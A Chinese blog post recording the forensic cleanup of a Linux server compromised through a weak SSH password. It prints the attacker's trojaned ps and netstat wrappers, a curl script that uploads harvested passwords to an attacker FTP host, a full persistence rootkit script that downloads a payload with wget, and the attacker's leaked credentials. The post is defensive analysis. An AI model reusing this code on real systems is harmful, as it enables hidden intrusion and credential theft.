当前位置:8090社团 >故障解决 > 查看文章
阿里云优惠码
03·26

帮朋友Linux应急记录

标签:, 故障解决

某日哥们的负责的服务器因为SSH弱口令被黑了(又是边界安全意识的问题),看到异常的进程信息如下:

lsof看一下打开的文件,发现/dev/g下存在这些东西

然后习惯性的按照时间排序查看一下命令,因为root已经被拿了所以非常有可能已经修改了命令。然后看到ps和netstat都非常小,这太不正常了。

-rwxr-xr-x 1 root root 78 Apr 30  2016 /bin/netstat
strings netstat
#!/bin/sh
for arg in "$*";do
.Fnetstat $arg|grep -v "125.77.31.197";done;exit

发现其实执行的是Fnetstat
ps也被替换了,最终执行的Fps

root@localhost tmp]# strings /bin/ps
#!/bin/sh
for arg in "$*";do
.Fps $arg|grep -v ".syslogd--system"|grep -v "a8137c40f9"|grep -v "ps"|grep -v "grep"|grep -v "nslookup"|grep -v "mail";done;exit

cron.hourly下的三个脚本mail.sh、mail.py、ssh_deny.sh

先来看ssh_deny.sh

/dev/black.txt记录的是SSH登录失败的IP及次数

pt是SSH的监听端口

脚本功能就是使用iptables封禁登录失败次数大于3次的IP

mail.py是一个发送邮件的脚本,会将/dev/1.txt发送出去。

从脚本中可以看到两个账号

user=’success501@163.com’,passwd=’ff1314′

还有一个qq邮箱995999349@qq.com

然后看mail.sh

#!/bin/bash
S=`date +%s%N | md5sum | head -c 10`
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
pt=`netstat -ntlp | awk '!a[$NF]++ && $NF~/sshd$/{sub (".*:","",$4);print $4}'`
Add=`nslookup www.1024kbs.com|grep "Address: "|awk '{print $2}'`
mv /dev/1.txt /dev/"$ip"+1+"$pt"+"$S".txt;mv /dev/2.txt /dev/"$ip"+2+"$pt"+"$S".txt
curl -u root:ff1314 -T "{/dev/"$ip"+1+"$pt"+"$S".txt,/dev/"$ip"+2+"$pt"+"$S".txt}" ftp://$Add:888
rm -rf /dev/"$ip"+1+"$pt"+"$S".txt /dev/"$ip"+2+"$pt"+"$S".txt

可以看出是将/dev/1.txt和/dev/2.txt重命名后上传到FTP上,然后删除掉。估计这里被装了SSH后门,1.txt和2.txt就是记录密码的文件,不过SSH被哥们的同事重装了,这里看不出来了,然后登下FTP看看。登上FTP服务器发现在几个密码文件

ftp> open www.1024kbs.com 888
Connected to www.1024kbs.com (118.193.212.86).
220 Welcome to www.Gxnn.com FTP Server!
Name (www.1024kbs.com:root): root
331 Password required for root
Password:
230 User successfully logged in.
Remote system type is Base.
ftp> ls
227 Entering Passive Mode (118,193,212,86,4,88).
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group              7 Nov 18 11:52 116.211.17.5+1+22+426e95d58e.txt
-rwx------ 1 user group              6 Nov 18 11:52 116.211.17.5+1+22+9ada1f5efb.txt
-rwx------ 1 user group             32 Nov 18 14:48 116.211.17.5+1+22+b500d80263.txt
-rwx------ 1 user group              7 Nov 18 11:52 116.211.17.5+2+22+426e95d58e.txt
-rwx------ 1 user group              6 Nov 18 11:52 116.211.17.5+2+22+9ada1f5efb.txt
-rwx------ 1 user group             50 Nov 18 14:55 221.229.164.18+1+22+8e46e6b7d4.txt
226 Transfer complete.
ftp>

又是其他受害者的SSH信息。搜索是995999349看到一篇文章。http://blog.chinaunix.net/uid-25057421-id-5195167.html发现了攻击者的脚本。

#! /bin/bash
#chkconfig:12345 90 90
#############################################
#############################################
#############################################
#############################################
#############################################
path=`pwd`
exit0="exit 0"
Fss="/usr/bin/.Fss"
Fps="/usr/bin/.Fps"
Fnet="/usr/bin/.Fnetstat"
LockAngel="/usr/bin/zfgsr"
Fssbak="/usr/bin/dpkgd/ss"
Fpsbak="/usr/bin/dpkgd/ps"
Fnetbak="/usr/bin/dpkgd/netstat"
MyFileAngel="/etc/init.d/.dbus-daemon--system"
PuppetAngel="/usr/bin/.dbus-daemon--system.bak"
allow="/etc/allow.bak"
Fconfig="/sbin/Fconfig.n"
S99="/etc/rc.d/init.d/S99.25000"
if [ ! -f  "$Fconfig" ];then
echo byqinshou 995999349 > $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
fi
Address1=`nslookup www.120kongbao.com|grep "Address: "|awk '{print $2}'`
if [ -z "$Address1" ];then
zfgsr -ia /etc/resolv.conf
echo 'nameserver 114.114.114.114'>/etc/resolv.conf
echo 'nameserver 8.8.8.8'>>/etc/resolv.conf
touch -d "2010-06-7 08:10:30"  /etc/resolv.conf
zfgsr +ia /etc/resolv.conf
fi
Ftempbash=`cat $Fconfig | awk '{print $2}'`   #现脚本文件名
Fbashtemp="/usr/bin/"$Ftempbash #现脚本路径
Fbashname=`date +%s%N | md5sum | head -c 10`
Fbashpath="/usr/bin/"$Fbashname #新脚本路径
if [ $0 != "$Fbashtemp" ];then
pkill $Ftempbash;killall $Ftempbash
zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash
zfgsr -ia $PuppetAngel;rm -f $PuppetAngel
fi
# -------------------------------------------------------------
if [ ! -f  "$LockAngel" ];then
zfgsr -ia $LockAngel
rm -rf $LockAngel
cp -f /usr/bin/chattr $LockAngel
cp -f /usr/bin/chattr /usr/bin/.zfgsr
cp -f /usr/bin/.zfgsr $LockAngel
chmod 777 $LockAngel
chmod 777 /usr/bin/.zfgsr
touch -d "2011-06-7 08:10:30"  $LockAngel
touch -d "2011-06-7 08:10:30"  /usr/bin/.zfgsr
rm -rf /usr/bin/chattr
zfgs +ia $LockAngel >/dev/null 2>&1
fi
#删除原chattr命令,并复制chattr为/usr/bin/.zfgsr和/usr/bin/zfgsr /usr/bin/zfgsr添加ai属性,不可增删改
if [ -f /usr/sbin/ss ];then
if [ ! -f "$Fss" ];then
if [ ! -f "$Fssbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /usr/sbin/ss $Fssbak
cp -f /usr/sbin/ss $Fss
else
cp -f $Fssbak $Fss
fi
zfgsr -ia /usr/sbin/ss
rm -rf /usr/sbin/ss
echo '#!/bin/sh' > /usr/sbin/ss
echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss
echo 'exit' >> /usr/sbin/ss
chmod 0755 $Fss;chmod 0755 /usr/sbin/ss
zfgsr +ia /usr/sbin/ss >/dev/null 2>&1
zfgsr +ia $Fssbak >/dev/null 2>&1
zfgsr +ia $Fss >/dev/null 2>&1
fi
fi
#修改ss命令
if [ -f /bin/netstat ];then
if [ ! -f "$Fnet" ];then
if [ ! -f "$Fnetbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/netstat $Fnetbak
cp -f /bin/netstat $Fnet
else
cp -f $Fnetbak $Fnet
fi
zfgsr -ia /bin/netstat
rm -rf /bin/netstat
echo '#!/bin/sh' > /bin/netstat
echo 'for arg in "$*";do' >> /bin/netstat
echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat
chmod 0755 $Fnet;chmod 0755 /bin/netstat
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia $Fnetbak >/dev/null 2>&1
zfgsr +ia $Fnet >/dev/null 2>&1
fi
fi
#修改netstat
if [ -f /bin/ps ];then
if [ ! -f "$Fps" ];then
if [ ! -f "$Fpsbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/ps $Fpsbak
cp -f /bin/ps $Fps
else
cp -f $Fpsbak $Fps
fi
zfgsr -ia /bin/ps
rm -rf /bin/ps
echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps
echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps
chmod 0755 $Fps;chmod 0755 /bin/ps
zfgsr +ia /bin/ps >/dev/null 2>&1
zfgsr +ia $Fpsbak >/dev/null 2>&1
zfgsr +ia $Fps >/dev/null 2>&1
fi
fi
#修改ps命令,屏蔽了ps、grep等显示
if [ ! -f  "$allow" ];then
cp -f /etc/hosts.allow $allow
zfgsr +ia $allow >/dev/null 2>&1
fi
# by qinshou -----------------------------------------------
ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l`
if [ $ExistAngel != 1 ];then
zfgsr -ia /usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system
chmod 777 /usr/bin/.dbus-daemon--system
/usr/bin/.dbus-daemon--system
  rm -rf /usr/bin/.dbus-daemon--system
fi
if [ ! -f  "$MyFileAngel" ];then
  zfgs -i /usr/bin/wget
  zfgs -a /usr/bin/wget
chmod 777 /usr/bin/wget
wget -P /etc/ http://www.120kongbao.com:999/1000.exe
zfgs -i $MyFileAngel
zfgs -a $MyFileAngel
rm -rf $MyFileAngel
chmod 777 /etc/1000.exe
mv -f /etc/1000.exe $MyFileAngel
zfgs +i $MyFileAngel
zfgs +a $MyFileAngel
chmod 0 /usr/bin/wget
zfgs +i /usr/bin/wget
zfgs +a /usr/bin/wget
fi
if [ ! -f  "$PuppetAngel" ];then
cp -f $MyFileAngel $PuppetAngel
zfgs +i $PuppetAngel
zfgs +a $PuppetAngel
fi
iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address1 -j ACCEPT
else
iptables -D INPUT -s $Address1 -j DROP
fi
# 自启动------------------
if [ ! -f  "$S99" ];then
echo "#!/bin/sh" >> $S99
echo "# chkconfig: 12345 90 90" >> $S99
echo "# description: $Ftempbash" >> $S99
echo "### BEGIN INIT INFO" >> $S99
echo "# Provides:    $Ftempbash" >> $S99
echo "# Required-Start:    " >> $S99
echo "# Required-Stop:    " >> $S99
echo "# Default-Start:    1 2 3 4 5" >> $S99
echo "# Default-Stop:    " >> $S99
echo "# Short-Description:    $Ftempbash" >> $S99
echo "### END INIT INFO" >> $S99
echo 'case $1 in' >> $S99
echo "start)" >> $S99
echo "    $Fbashpath" >> $S99
echo "    ;;" >> $S99
echo "stop)" >> $S99
echo "    ;;" >> $S99
echo "*)" >> $S99
echo "    $Fbashpath" >> $S99
echo "    ;;" >> $S99
echo "esac" >> $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath
sed -i "s|$Ftempbash|$Fbashname|" $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath
# by qinshou -----------------------------------------------
if [ -z "`$S99|grep "$Fbashtemp"`" ]; then
sed -i "s|$Ftempbash|$Fbashname|" $S99
chmod 777 $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr
zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1
sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 &
# by qinshou -----------------------------------------------
zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps
zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia /bin/ps >/dev/null 2>&1
# by qinshou -----------------------------------------------
exit

 

 

 

 

 

 

 

本文链接:https://www.8090st.com/server-ssh-weak-password.html 转载请注明出处.
如果喜欢:点此订阅本站
迷城
如果一件事情值得去做,那它就值得做好。
查看Ta的专栏 | 腾讯微博
关于本文小编
相关文章
为您推荐
各种观点
暂时还木有人评论,坐等沙发!
发表评论

快捷键:Ctrl+Enter